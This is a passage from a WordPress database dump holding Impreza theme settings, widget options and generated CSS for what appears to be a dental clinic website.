0:\"top center\";s:24:\"body_bg_image_attachment\";i:1;s:17:\"site_canvas_width\";s:4:\"1240\";s:18:\"site_content_width\";i:1200;s:13:\"sidebar_width\";s:2:\"25\";s:13:\"content_width\";i:68;s:22:\"columns_stacking_width\";i:900;s:21:\"disable_effects_width\";i:1025;s:10:\"row_height\";s:6:\"medium\";s:22:\"color_header_middle_bg\";s:7:\"#ffffff\";s:24:\"color_header_middle_text\";s:7:\"#333333\";s:30:\"color_header_middle_text_hover\";s:7:\"#324889\";s:20:\"color_chrome_toolbar\";s:7:\"#f5f5f5\";s:19:\"color_header_top_bg\";s:7:\"#f5f5f5\";s:21:\"color_header_top_text\";s:7:\"#777777\";s:27:\"color_header_top_text_hover\";s:7:\"#324889\";s:22:\"color_header_bottom_bg\";s:7:\"#f5f5f5\";s:24:\"color_header_bottom_text\";s:7:\"#777777\";s:30:\"color_header_bottom_text_hover\";s:7:\"#324889\";s:29:\"color_header_transparent_text\";s:7:\"#ffffff\";s:35:\"color_header_transparent_text_hover\";s:7:\"#ffffff\";s:22:\"color_header_search_bg\";s:7:\"#ffffff\";s:24:\"color_header_search_text\";s:7:\"#324889\";s:34:\"color_menu_transparent_active_text\";s:7:\"#324889\";s:19:\"color_menu_hover_bg\";s:7:\"#324889\";s:21:\"color_menu_hover_text\";s:7:\"#ffffff\";s:20:\"color_menu_active_bg\";s:11:\"transparent\";s:22:\"color_menu_active_text\";s:7:\"#324889\";s:20:\"color_menu_button_bg\";s:7:\"#324889\";s:22:\"color_menu_button_text\";s:7:\"#ffffff\";s:26:\"color_menu_button_hover_bg\";s:7:\"#096fb6\";s:28:\"color_menu_button_hover_text\";s:7:\"#ffffff\";s:13:\"color_drop_bg\";s:7:\"#324889\";s:15:\"color_drop_text\";s:7:\"#ffffff\";s:19:\"color_drop_hover_bg\";s:7:\"#ffffff\";s:21:\"color_drop_hover_text\";s:7:\"#324889\";s:20:\"color_drop_active_bg\";s:7:\"#096fb6\";s:22:\"color_drop_active_text\";s:7:\"#ffffff\";s:16:\"color_content_bg\";s:7:\"#ffffff\";s:20:\"color_content_bg_alt\";s:7:\"#f2f2f2\";s:20:\"color_content_border\";s:7:\"#e5e5e5\";s:21:\"color_content_heading\";s:7:\"#333333\";s:18:\"color_content_text\";s:7:\"#333333\";s:18:\"color_content_link\";s:7:\"#324889\";s:24:\"color_content_link_hover\";s:7:\"#004e7a\";s:21:\"color_content_primary\";s:7:\"#324889\";s:23:\"color_content_secondary\";s:7:\"#004e7a\";s:19:\"color_content_faded\";s:7:\"#999999\";s:20:\"color_alt_content_bg\";s:7:\"#f2f2f2\";s:24:\"color_alt_content_bg_alt\";s:7:\"#ffffff\";s:24:\"color_alt_content_border\";s:7:\"#dddddd\";s:25:\"color_alt_content_heading\";s:7:\"#333333\";s:22:\"color_alt_content_text\";s:7:\"#333333\";s:22:\"color_alt_content_link\";s:7:\"#324889\";s:28:\"color_alt_content_link_hover\";s:7:\"#004e7a\";s:25:\"color_alt_content_primary\";s:7:\"#324889\";s:27:\"color_alt_content_secondary\";s:7:\"#004e7a\";s:23:\"color_alt_content_faded\";s:7:\"#999999\";s:18:\"color_subfooter_bg\";s:7:\"#333333\";s:22:\"color_subfooter_bg_alt\";s:7:\"#292929\";s:22:\"color_subfooter_border\";s:7:\"#444444\";s:20:\"color_subfooter_text\";s:7:\"#999999\";s:20:\"color_subfooter_link\";s:7:\"#e5e5e5\";s:26:\"color_subfooter_link_hover\";s:7:\"#324889\";s:15:\"color_footer_bg\";s:7:\"#ffffff\";s:19:\"color_footer_bg_alt\";s:7:\"#f2f2f2\";s:19:\"color_footer_border\";s:7:\"#e5e5e5\";s:17:\"color_footer_text\";s:7:\"#777777\";s:17:\"color_footer_link\";s:7:\"#324889\";s:23:\"color_footer_link_hover\";s:7:\"#004e7a\";s:11:\"color_style\";s:8:\"custom-1\";s:9:\"header_id\";i:5932;s:25:\"header_portfolio_defaults\";i:1;s:19:\"header_portfolio_id\";i:5932;s:20:\"header_post_defaults\";i:1;s:14:\"header_post_id\";i:5932;s:23:\"header_archive_defaults\";i:1;s:17:\"header_archive_id\";i:5932;s:20:\"header_shop_defaults\";i:1;s:14:\"header_shop_id\";i:5932;s:23:\"header_product_defaults\";i:1;s:17:\"header_product_id\";i:5932;s:13:\"header_layout\";s:10:\"extended_1\";s:13:\"header_sticky\";a:3:{i:0;s:7:\"default\";i:1;s:7:\"tablets\";i:2;s:7:\"mobiles\";}s:18:\"header_transparent\";s:1:\"0\";s:16:\"header_fullwidth\";i:0;s:17:\"header_top_height\";s:2:\"36\";s:24:\"header_top_sticky_height\";i:0;s:20:\"header_middle_height\";s:3:\"120\";s:27:\"header_middle_sticky_height\";s:2:\"60\";s:20:\"header_bottom_height\";s:2:\"36\";s:27:\"header_bottom_sticky_height\";i:40;s:17:\"header_main_width\";i:300;s:22:\"header_invert_logo_pos\";s:1:\"0\";s:18:\"header_search_show\";s:1:\"1\";s:20:\"header_search_layout\";s:10:\"fullscreen\";s:20:\"header_contacts_show\";s:1:\"1\";s:21:\"header_contacts_phone\";s:13:\"+321 123 4567\";s:21:\"header_contacts_email\";s:13:\"info@test.com\";s:9:\"logo_type\";s:4:\"text\";s:9:\"logo_text\";s:7:\"IMPREZA\";s:14:\"logo_font_size\";i:30;s:22:\"logo_font_size_tablets\";i:24;s:22:\"logo_font_size_mobiles\";i:20;s:10:\"logo_image\";s:0:\"\";s:11:\"logo_height\";s:2:\"30\";s:18:\"logo_height_sticky\";s:2:\"30\";s:19:\"logo_height_tablets\";s:2:\"30\";s:19:\"logo_height_mobiles\";i:20;s:11:\"menu_source\";s:11:\"header-menu\";s:13:\"menu_fontsize\";s:2:\"16\";s:12:\"menu_indents\";i:40;s:11:\"menu_height\";s:1:\"1\";s:17:\"menu_sub_fontsize\";s:2:\"15\";s:17:\"menu_mobile_width\";i:1111;s:19:\"menu_togglable_type\";s:1:\"1\";s:8:\"titlebar\";i:1;s:13:\"titlebar_size\";s:5:\"small\";s:14:\"titlebar_color\";s:9:\"alternate\";s:20:\"titlebar_breadcrumbs\";i:1;s:17:\"titlebar_bg_image\";s:0:\"\";s:16:\"titlebar_bg_size\";s:5:\"cover\";s:18:\"titlebar_bg_repeat\";s:6:\"repeat\";s:20:\"titlebar_bg_position\";s:13:\"center center\";s:20:\"titlebar_bg_parallax\";s:4:\"none\";s:22:\"titlebar_overlay_color\";s:0:\"\";s:18:\"titlebar_portfolio\";i:1;s:27:\"titlebar_portfolio_defaults\";s:1:\"1\";s:23:\"titlebar_portfolio_size\";s:5:\"large\";s:24:\"titlebar_portfolio_color\";s:7:\"default\";s:30:\"titlebar_portfolio_breadcrumbs\";i:0;s:27:\"titlebar_portfolio_bg_image\";s:0:\"\";s:26:\"titlebar_portfolio_bg_size\";s:5:\"cover\";s:28:\"titlebar_portfolio_bg_repeat\";s:6:\"repeat\";s:30:\"titlebar_portfolio_bg_position\";s:13:\"center center\";s:30:\"titlebar_portfolio_bg_parallax\";s:4:\"none\";s:32:\"titlebar_portfolio_overlay_color\";s:0:\"\";s:13:\"titlebar_post\";s:1:\"1\";s:22:\"titlebar_post_defaults\";s:1:\"1\";s:19:\"titlebar_post_title\";s:0:\"\";s:18:\"titlebar_post_size\";s:5:\"large\";s:19:\"titlebar_post_color\";s:7:\"default\";s:25:\"titlebar_post_breadcrumbs\";i:0;s:22:\"titlebar_post_bg_image\";s:0:\"\";s:21:\"titlebar_post_bg_size\";s:5:\"cover\";s:23:\"titlebar_post_bg_repeat\";s:6:\"repeat\";s:25:\"titlebar_post_bg_position\";s:13:\"center center\";s:25:\"titlebar_post_bg_parallax\";s:4:\"none\";s:27:\"titlebar_post_overlay_color\";s:0:\"\";s:16:\"titlebar_archive\";i:1;s:25:\"titlebar_archive_defaults\";i:1;s:21:\"titlebar_archive_size\";s:5:\"large\";s:22:\"titlebar_archive_color\";s:7:\"default\";s:28:\"titlebar_archive_breadcrumbs\";i:1;s:25:\"titlebar_archive_bg_image\";s:0:\"\";s:24:\"titlebar_archive_bg_size\";s:5:\"cover\";s:26:\"titlebar_archive_bg_repeat\";s:6:\"repeat\";s:28:\"titlebar_archive_bg_position\";s:13:\"center center\";s:28:\"titlebar_archive_bg_parallax\";s:4:\"none\";s:30:\"titlebar_archive_overlay_color\";s:0:\"\";s:13:\"titlebar_shop\";i:0;s:22:\"titlebar_shop_defaults\";i:1;s:18:\"titlebar_shop_size\";s:6:\"medium\";s:19:\"titlebar_shop_color\";s:9:\"alternate\";s:25:\"titlebar_shop_breadcrumbs\";i:0;s:22:\"titlebar_shop_bg_image\";s:0:\"\";s:21:\"titlebar_shop_bg_size\";s:5:\"cover\";s:23:\"titlebar_shop_bg_repeat\";s:6:\"repeat\";s:25:\"titlebar_shop_bg_position\";s:13:\"center center\";s:25:\"titlebar_shop_bg_parallax\";s:4:\"none\";s:27:\"titlebar_shop_overlay_color\";s:0:\"\";s:7:\"sidebar\";i:0;s:10:\"sidebar_id\";s:15:\"default_sidebar\";s:11:\"sidebar_pos\";s:5:\"right\";s:17:\"portfolio_sidebar\";i:0;s:20:\"portfolio_sidebar_id\";s:15:\"default_sidebar\";s:21:\"portfolio_sidebar_pos\";s:5:\"right\";s:12:\"post_sidebar\";i:1;s:15:\"post_sidebar_id\";s:15:\"default_sidebar\";s:16:\"post_sidebar_pos\";s:4:\"left\";s:12:\"blog_sidebar\";i:1;s:15:\"blog_sidebar_id\";s:15:\"default_sidebar\";s:16:\"blog_sidebar_pos\";s:4:\"left\";s:15:\"archive_sidebar\";s:1:\"0\";s:18:\"archive_sidebar_id\";s:15:\"default_sidebar\";s:19:\"archive_sidebar_pos\";s:5:\"right\";s:14:\"search_sidebar\";s:1:\"0\";s:17:\"search_sidebar_id\";s:15:\"default_sidebar\";s:18:\"search_sidebar_pos\";s:5:\"right\";s:12:\"shop_sidebar\";i:1;s:15:\"shop_sidebar_id\";s:15:\"default_sidebar\";s:16:\"shop_sidebar_pos\";s:5:\"right\";s:15:\"product_sidebar\";i:0;s:18:\"product_sidebar_id\";s:15:\"default_sidebar\";s:19:\"product_sidebar_pos\";s:5:\"right\";s:13:\"event_sidebar\";i:0;s:16:\"event_sidebar_id\";s:15:\"default_sidebar\";s:17:\"event_sidebar_pos\";s:5:\"right\";s:13:\"forum_sidebar\";i:1;s:16:\"forum_sidebar_id\";s:15:\"default_sidebar\";s:17:\"forum_sidebar_pos\";s:5:\"right\";s:9:\"footer_id\";s:11:\"site-footer\";s:25:\"footer_portfolio_defaults\";i:1;s:19:\"footer_portfolio_id\";s:11:\"site-footer\";s:20:\"footer_post_defaults\";i:1;s:14:\"footer_post_id\";s:11:\"site-footer\";s:23:\"footer_archive_defaults\";i:1;s:17:\"footer_archive_id\";s:11:\"site-footer\";s:20:\"footer_shop_defaults\";i:1;s:14:\"footer_shop_id\";s:11:\"site-footer\";s:23:\"footer_product_defaults\";i:1;s:17:\"footer_product_id\";s:11:\"site-footer\";s:16:\"body_font_family\";s:17:\"Open Sans|400,600\";s:13:\"body_fontsize\";s:2:\"16\";s:15:\"body_lineheight\";s:2:\"28\";s:20:\"body_fontsize_mobile\";s:2:\"16\";s:22:\"body_lineheight_mobile\";s:2:\"26\";s:19:\"heading_font_family\";s:21:\"Open Sans|300,400,600\";s:11:\"h1_fontsize\";s:2:\"46\";s:18:\"h1_fontsize_mobile\";s:2:\"36\";s:13:\"h1_lineheight\";d:1.3999999999999999;s:13:\"h1_fontweight\";s:3:\"300\";s:16:\"h1_letterspacing\";d:-0.02;s:12:\"h1_transform\";a:0:{}s:11:\"h2_fontsize\";s:2:\"38\";s:18:\"h2_fontsize_mobile\";s:2:\"30\";s:13:\"h2_lineheight\";d:1.3999999999999999;s:13:\"h2_fontweight\";i:400;s:16:\"h2_letterspacing\";i:0;s:12:\"h2_transform\";a:0:{}s:11:\"h3_fontsize\";s:2:\"30\";s:18:\"h3_fontsize_mobile\";s:2:\"24\";s:13:\"h3_lineheight\";d:1.3999999999999999;s:13:\"h3_fontweight\";i:400;s:16:\"h3_letterspacing\";i:0;s:12:\"h3_transform\";s:0:\"\";s:11:\"h4_fontsize\";s:2:\"24\";s:18:\"h4_fontsize_mobile\";s:2:\"22\";s:13:\"h4_lineheight\";d:1.3999999999999999;s:13:\"h4_fontweight\";i:400;s:16:\"h4_letterspacing\";s:1:\"0\";s:12:\"h4_transform\";s:0:\"\";s:11:\"h5_fontsize\";s:2:\"20\";s:18:\"h5_fontsize_mobile\";s:2:\"20\";s:13:\"h5_lineheight\";d:1.3999999999999999;s:13:\"h5_fontweight\";i:400;s:16:\"h5_letterspacing\";s:1:\"0\";s:12:\"h5_transform\";s:0:\"\";s:11:\"h6_fontsize\";s:2:\"18\";s:18:\"h6_fontsize_mobile\";s:2:\"18\";s:13:\"h6_lineheight\";d:1.3999999999999999;s:13:\"h6_fontweight\";i:400;s:16:\"h6_letterspacing\";s:1:\"0\";s:12:\"h6_transform\";s:0:\"\";s:11:\"custom_font\";a:0:{}s:11:\"font_subset\";s:5:\"latin\";s:14:\"uploaded_fonts\";s:0:\"\";s:14:\"button_preview\";s:0:\"\";s:11:\"button_font\";s:4:\"body\";s:17:\"button_text_style\";a:2:{i:0;s:4:\"bold\";i:1;s:9:\"uppercase\";}s:15:\"button_fontsize\";i:16;s:17:\"button_fontweight\";i:600;s:20:\"button_letterspacing\";i:0;s:13:\"button_height\";d:2.7999999999999998;s:12:\"button_width\";d:1.8;s:20:\"button_border_radius\";d:0.29999999999999999;s:13:\"button_shadow\";i:0;s:12:\"button_hover\";s:5:\"slide\";s:19:\"button_shadow_hover\";i:0;s:26:\"portfolio_breadcrumbs_page\";s:13:\"hizmetlerimiz\";s:18:\"portfolio_comments\";s:1:\"0\";s:13:\"portfolio_nav\";i:1;s:20:\"portfolio_nav_invert\";i:1;s:22:\"portfolio_nav_category\";i:0;s:14:\"portfolio_slug\";s:13:\"hizmetlerimiz\";s:23:\"portfolio_category_slug\";s:22:\"hizmetlerimiz_category\";s:19:\"post_preview_layout\";s:6:\"modern\";s:21:\"post_preview_img_size\";s:4:\"full\";s:9:\"post_meta\";a:0:{}s:12:\"post_sharing\";s:1:\"1\";s:22:\"post_sharing_providers\";a:6:{i:0;s:5:\"email\";i:1;s:8:\"facebook\";i:2;s:7:\"twitter\";i:3;s:5:\"gplus\";i:4;s:8:\"linkedin\";i:5;s:9:\"pinterest\";}s:17:\"post_sharing_type\";s:5:\"solid\";s:15:\"post_author_box\";s:1:\"0\";s:8:\"post_nav\";s:1:\"1\";s:15:\"post_nav_layout\";s:7:\"default\";s:15:\"post_nav_invert\";i:0;s:17:\"post_nav_category\";s:1:\"0\";s:12:\"post_related\";s:1:\"0\";s:19:\"post_related_layout\";s:4:\"6224\";s:21:\"post_related_img_size\";s:15:\"us_600_400_crop\";s:21:\"post_related_quantity\";s:1:\"3\";s:17:\"post_related_cols\";i:3;s:22:\"post_related_items_gap\";i:1;s:11:\"blog_layout\";s:12:\"blog_classic\";s:13:\"blog_img_size\";s:7:\"default\";s:9:\"blog_type\";s:4:\"grid\";s:9:\"blog_cols\";s:1:\"1\";s:14:\"blog_items_gap\";i:5;s:15:\"blog_pagination\";s:7:\"regular\";s:14:\"archive_layout\";s:4:\"6224\";s:16:\"archive_img_size\";s:7:\"default\";s:12:\"archive_type\";s:4:\"grid\";s:12:\"archive_cols\";s:1:\"2\";s:17:\"archive_items_gap\";i:5;s:18:\"archive_pagination\";s:4:\"ajax\";s:13:\"search_layout\";s:4:\"6224\";s:15:\"search_img_size\";s:7:\"default\";s:11:\"search_type\";s:4:\"grid\";s:11:\"search_cols\";s:1:\"2\";s:16:\"search_items_gap\";i:1;s:17:\"search_pagination\";s:7:\"regular\";s:23:\"blog_breakpoint_1_width\";i:1200;s:22:\"blog_breakpoint_1_cols\";s:1:\"3\";s:23:\"blog_breakpoint_2_width\";i:900;s:22:\"blog_breakpoint_2_cols\";s:1:\"2\";s:23:\"blog_breakpoint_3_width\";i:600;s:22:\"blog_breakpoint_3_cols\";s:1:\"1\";s:18:\"shop_listing_style\";s:8:\"standard\";s:12:\"shop_columns\";s:1:\"3\";s:19:\"product_related_qty\";s:1:\"4\";s:9:\"shop_cart\";s:7:\"compact\";s:12:\"shop_catalog\";i:0;s:16:\"enable_portfolio\";i:1;s:19:\"enable_testimonials\";s:1:\"0\";s:10:\"og_enabled\";s:1:\"1\";s:13:\"schema_markup\";s:1:\"1\";s:14:\"lazyload_fonts\";s:1:\"0\";s:13:\"jquery_footer\";s:1:\"1\";s:22:\"disable_jquery_migrate\";i:1;s:12:\"ajax_load_js\";s:1:\"1\";s:16:\"disable_extra_vc\";s:1:\"1\";s:15:\"optimize_assets\";i:0;s:6:\"assets\";a:47:{i:0;s:9:\"animation\";i:1;s:8:\"carousel\";i:2;s:7:\"columns\";i:3;s:8:\"comments\";i:4;s:7:\"filters\";i:5;s:5:\"forms\";i:6;s:6:\"header\";i:7;s:10:\"pagination\";i:8;s:9:\"preloader\";i:9;s:5:\"print\";i:10;s:5:\"popup\";i:11;s:8:\"titlebar\";i:12;s:12:\"font-awesome\";i:13;s:14:\"material-icons\";i:14;s:9:\"actionbox\";i:15;s:4:\"blog\";i:16;s:7:\"buttons\";i:17;s:6:\"charts\";i:18;s:8:\"contacts\";i:19;s:7:\"counter\";i:20;s:5:\"gmaps\";i:21;s:4:\"grid\";i:22;s:7:\"gallery\";i:23;s:6:\"slider\";i:24;s:7:\"iconbox\";i:25;s:5:\"logos\";i:26;s:4:\"menu\";i:27;s:7:\"message\";i:28;s:6:\"person\";i:29;s:7:\"pricing\";i:30;s:7:\"progbar\";i:31;s:8:\"scroller\";i:32;s:6:\"search\";i:33;s:9:\"separator\";i:34;s:7:\"sharing\";i:35;s:5:\"image\";i:36;s:7:\"socials\";i:37;s:4:\"tabs\";i:38;s:5:\"video\";i:39;s:7:\"bbpress\";i:40;s:12:\"gravityforms\";i:41;s:17:\"slider-revolution\";i:42;s:10:\"tablepress\";i:43;s:12:\"tribe-events\";i:44;s:15:\"ultimate-addons\";i:45;s:11:\"woocommerce\";i:46;s:4:\"wpml\";}s:8:\"img_size\";a:4:{i:0;a:3:{s:5:\"width\";i:350;s:6:\"height\";i:350;s:4:\"crop\";a:1:{i:0;s:4:\"crop\";}}i:1;a:3:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"crop\";a:1:{i:0;s:4:\"crop\";}}i:2;a:3:{s:5:\"width\";i:600;s:6:\"height\";i:0;s:4:\"crop\";a:0:{}}i:3;a:3:{s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"400\";s:4:\"crop\";a:1:{i:0;s:4:\"crop\";}}}s:10:\"custom_css\";s:0:\"\";s:11:\"custom_html\";s:0:\"\";s:8:\"of_reset\";s:0:\"\";}', 'yes'),
(153, 'widget_us_contacts', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(154, 'widget_us_login', 'a:2:{i:1;a:5:{s:5:\"title\";s:0:\"\";s:8:\"register\";s:0:\"\";s:8:\"lostpass\";s:0:\"\";s:14:\"login_redirect\";s:0:\"\";s:15:\"logout_redirect\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(155, 'widget_us_portfolio', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(156, 'widget_us_blog', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(157, 'widget_us_socials', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(158, 'Impreza_editor_caps_set', '1', 'yes'),
(159, 'us_theme_options_css', '@font-face{font-family:\'Font Awesome 5 Brands\';font-style:normal;font-weight:normal;src:url(\"http://www.ze-dent.com/wp-content/themes/Impreza/fonts/fa-brands-400.woff2\") format(\"woff2\"),url(\"http://www.ze-dent.com/wp-content/themes/Impreza/fonts/fa-brands-400.woff\") format(\"woff\")}.fab{font-family:\'Font Awesome 5 Brands\'}@font-face{font-family:\'fontawesome\';font-style:normal;font-weight:300;src:url(\"http://www.ze-dent.com/wp-content/themes/Impreza/fonts/fa-light-300.woff2\") format(\"woff2\"),url(\"http://www.ze-dent.com/wp-content/themes/Impreza/fonts/fa-light-300.woff\") format(\"woff\")}.fal{font-family:\'fontawesome\';font-weight:300}@font-face{font-family:\'fontawesome\';font-style:normal;font-weight:400;src:url(\"http://www.ze-dent.com/wp-content/themes/Impreza/fonts/fa-regular-400.woff2\") format(\"woff2\"),url(\"http://www.ze-dent.com/wp-content/themes/Impreza/fonts/fa-regular-400.woff\") format(\"woff\")}.far{font-family:\'fontawesome\';font-weight:400}@font-face{font-family:\'fontawesome\';font-style:normal;font-weight:900;src:url(\"http://www.ze-dent.com/wp-content/themes/Impreza/fonts/fa-solid-900.woff2\") format(\"woff2\"),url(\"http://www.ze-dent.com/wp-content/themes/Impreza/fonts/fa-solid-900.woff\") format(\"woff\")}.fa,.fas{font-family:\'fontawesome\';font-weight:900}.style_phone6-1>div{background-image:url(http://www.ze-dent.com/wp-content/themes/Impreza/framework/img/phone-6-black-real.png)}.style_phone6-2>div{background-image:url(http://www.ze-dent.com/wp-content/themes/Impreza/framework/img/phone-6-white-real.png)}.style_phone6-3>div{background-image:url(http://www.ze-dent.com/wp-content/themes/Impreza/framework/img/phone-6-black-flat.png)}.style_phone6-4>div{background-image:url(http://www.ze-dent.com/wp-content/themes/Impreza/framework/img/phone-6-white-flat.png)}html,.w-nav .widget{font-family:\"Open Sans\", sans-serif;font-weight:400;font-size:16px;line-height:28px}h1, h2, h3, h4, h5, h6,.w-counter-number,.w-pricing-item-price,.w-tabs-item-title,.stats-block .stats-desc .stats-number{font-family:\"Open Sans\", sans-serif;font-weight:300}h1{font-size:46px;line-height:1.4;font-weight:300;letter-spacing:-0.02em}h2{font-size:38px;line-height:1.4;font-weight:400;letter-spacing:0em}h3{font-size:30px;line-height:1.4;font-weight:400;letter-spacing:0em}h4,.widgettitle,.comment-reply-title{font-size:24px;line-height:1.4;font-weight:400;letter-spacing:0em}h5{font-size:20px;line-height:1.4;font-weight:400;letter-spacing:0em}h6{font-size:18px;line-height:1.4;font-weight:400;letter-spacing:0em}@media (max-width:767px){html{font-size:16px;line-height:26px}h1{font-size:36px}h1.vc_custom_heading{font-size:36px !important}h2{font-size:30px}h2.vc_custom_heading{font-size:30px !important}h3{font-size:24px}h3.vc_custom_heading{font-size:24px !important}h4,.widgettitle,.comment-reply-title{font-size:22px}h4.vc_custom_heading{font-size:22px !important}h5{font-size:20px}h5.vc_custom_heading{font-size:20px !important}h6{font-size:18px}h6.vc_custom_heading{font-size:18px !important}}body,.header_hor .l-header.pos_fixed{min-width:1240px}.l-canvas.type_boxed,.l-canvas.type_boxed .l-subheader,.l-canvas.type_boxed .l-section.type_sticky,.l-canvas.type_boxed~.l-footer{max-width:1240px}.header_hor .l-subheader-h,.l-titlebar-h,.l-main-h,.l-section-h,.w-tabs-section-content-h,.w-blogpost-body{max-width:1200px}@media (max-width:1350px){.l-section:not(.width_full) .owl-nav{display:none}}@media (max-width:1400px){.l-section:not(.width_full) .w-grid .owl-nav{display:none}}.l-sidebar{width:25%}.l-content{width:68%}@media (max-width:899px){.g-cols>div:not([class*=\" vc_col-\"]){width:100%;margin:0 0 1rem}.g-cols.type_boxes>div,.g-cols>div:last-child,.g-cols>div.has-fill{margin-bottom:0}.vc_wp_custommenu.layout_hor,.align_center_xs,.align_center_xs .w-socials{text-align:center}}.w-btn,.button,.l-body .cl-btn,.l-body .ubtn,.l-body .ultb3-btn,.l-body .btn-modal,.l-body .flip-box-wrap .flip_link a,.rev_slider a.w-btn, .tribe-events-button,button[type=\"submit\"],input[type=\"submit\"]{text-transform:uppercase;font-size:16px;font-weight:600;line-height:2.8;padding:0 1.8em;border-radius:0.3em;letter-spacing:0em;box-shadow:0 0em 0em rgba(0,0,0,0.18)}.w-btn.icon_atleft i{left:1.8em}.w-btn.icon_atright i{right:1.8em}.w-header-show,.w-toplink{background-color:rgba(0,0,0,0.3)}a,button,input[type=\"submit\"],.ui-slider-handle{outline:none !important}body{background-color:#eeeeee;-webkit-tap-highlight-color:rgba(50,72,137,0.2)}.l-subheader.at_top,.l-subheader.at_top .w-dropdown-list,.l-subheader.at_top .type_mobile .w-nav-list.level_1{background-color:#f5f5f5}.l-subheader.at_top,.l-subheader.at_top .w-dropdown.active,.l-subheader.at_top .type_mobile .w-nav-list.level_1{color:#777777}.no-touch .l-subheader.at_top a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_top .w-dropdown.active a:hover{color:#324889}.header_ver .l-header,.header_hor .l-subheader.at_middle,.l-subheader.at_middle .w-dropdown-list,.l-subheader.at_middle .type_mobile .w-nav-list.level_1{background-color:#ffffff}.l-subheader.at_middle,.l-subheader.at_middle .w-dropdown.active,.l-subheader.at_middle .type_mobile .w-nav-list.level_1{color:#333333}.no-touch .l-subheader.at_middle a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_middle .w-dropdown.active a:hover{color:#324889}.l-subheader.at_bottom,.l-subheader.at_bottom .w-dropdown-list,.l-subheader.at_bottom .type_mobile .w-nav-list.level_1{background-color:#f5f5f5}.l-subheader.at_bottom,.l-subheader.at_bottom .w-dropdown.active,.l-subheader.at_bottom .type_mobile .w-nav-list.level_1{color:#777777}.no-touch .l-subheader.at_bottom a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_bottom .w-dropdown.active a:hover{color:#324889}.l-header.bg_transparent:not(.sticky) .l-subheader{color:#ffffff}.no-touch .l-header.bg_transparent:not(.sticky) .w-text a:hover,.no-touch .l-header.bg_transparent:not(.sticky) .w-html a:hover,.no-touch .l-header.bg_transparent:not(.sticky) .w-dropdown a:hover,.no-touch .l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1:hover>.w-nav-anchor{color:#ffffff}.l-header.bg_transparent:not(.sticky) .w-nav-title:after{background-color:#ffffff}.w-search-form{background-color:#ffffff;color:#324889}.menu-item.level_1>.w-nav-anchor:focus,.no-touch .menu-item.level_1.opened>.w-nav-anchor,.no-touch .menu-item.level_1:hover>.w-nav-anchor{background-color:#324889;color:#ffffff}.w-nav-title:after{background-color:#ffffff}.menu-item.level_1.current-menu-item>.w-nav-anchor,.menu-item.level_1.current-menu-parent>.w-nav-anchor,.menu-item.level_1.current-menu-ancestor>.w-nav-anchor{background-color:transparent;color:#324889}.l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1.current-menu-item>.w-nav-anchor,.l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1.current-menu-ancestor>.w-nav-anchor{color:#324889}.w-nav-list:not(.level_1){background-color:#324889;color:#ffffff}.no-touch .menu-item:not(.level_1)>.w-nav-anchor:focus,.no-touch .menu-item:not(.level_1):hover>.w-nav-anchor{background-color:#ffffff;color:#324889}.menu-item:not(.level_1).current-menu-item>.w-nav-anchor,.menu-item:not(.level_1).current-menu-parent>.w-nav-anchor,.menu-item:not(.level_1).current-menu-ancestor>.w-nav-anchor{background-color:#096fb6;color:#ffffff}.w-cart-quantity,.btn.w-menu-item,.btn.menu-item.level_1>a,.l-footer .vc_wp_custommenu.layout_hor .btn>a{background-color:#324889 !important;color:#ffffff !important}.no-touch .btn.w-menu-item:hover,.no-touch .btn.menu-item.level_1>a:hover,.no-touch .l-footer .vc_wp_custommenu.layout_hor .btn>a:hover{background-color:#096fb6 !important;color:#ffffff !important}body.us_iframe,.l-preloader,.l-canvas,.l-footer,.l-popup-box-content,.g-filters.style_1 .g-filters-item.active,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.no-touch .w-tabs.layout_default .w-tabs-item.active:hover,.no-touch .w-tabs.layout_ver .w-tabs-item.active:hover,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.wpml-ls-statics-footer,.select2-selection__choice,.select2-search input{background-color:#ffffff}.w-tabs.layout_modern .w-tabs-item:after{border-bottom-color:#ffffff}.w-iconbox.style_circle.color_contrast .w-iconbox-icon,.tribe-events-calendar thead th{color:#ffffff}.w-btn.color_contrast.style_solid,.no-touch .btn_hov_fade .w-btn.color_contrast.style_outlined:hover,.no-touch .btn_hov_slide .w-btn.color_contrast.style_outlined:hover,.no-touch .btn_hov_reverse .w-btn.color_contrast.style_outlined:hover{color:#ffffff !important}input,textarea,select,.l-section.for_blogpost .w-blogpost-preview,.w-actionbox.color_light,.w-form-row.for_checkbox label>i,.g-filters.style_1,.g-filters.style_2 .g-filters-item.active,.w-grid-none,.w-iconbox.style_circle.color_light .w-iconbox-icon,.g-loadmore.type_block .g-loadmore-btn,.w-pricing-item-header,.w-progbar-bar,.w-progbar.style_3 .w-progbar-bar:before,.w-progbar.style_3 .w-progbar-bar-count,.w-socials.style_solid .w-socials-item-link,.w-tabs.layout_default .w-tabs-list,.w-tabs.layout_ver .w-tabs-list,.no-touch .l-main .widget_nav_menu a:hover,.wp-caption-text,.smile-icon-timeline-wrap .timeline-wrapper .timeline-block,.smile-icon-timeline-wrap .timeline-feature-item.feat-item,.wpml-ls-legacy-dropdown a,.wpml-ls-legacy-dropdown-click a,.tablepress .row-hover tr:hover td,.select2-selection,.select2-dropdown{background-color:#f2f2f2}.timeline-wrapper .timeline-post-right .ult-timeline-arrow l,.timeline-wrapper .timeline-post-left .ult-timeline-arrow l,.timeline-feature-item.feat-item .ult-timeline-arrow l{border-color:#f2f2f2}hr,td,th,.l-section,.vc_column_container,.vc_column-inner,.w-author,.w-btn.color_light,.w-comments-list,.w-image,.w-pricing-item-h,.w-profile,.w-sharing-item,.w-tabs-list,.w-tabs-section,.w-tabs-section-header:before,.w-tabs.layout_timeline.accordion .w-tabs-section-content,.widget_calendar #calendar_wrap,.l-main 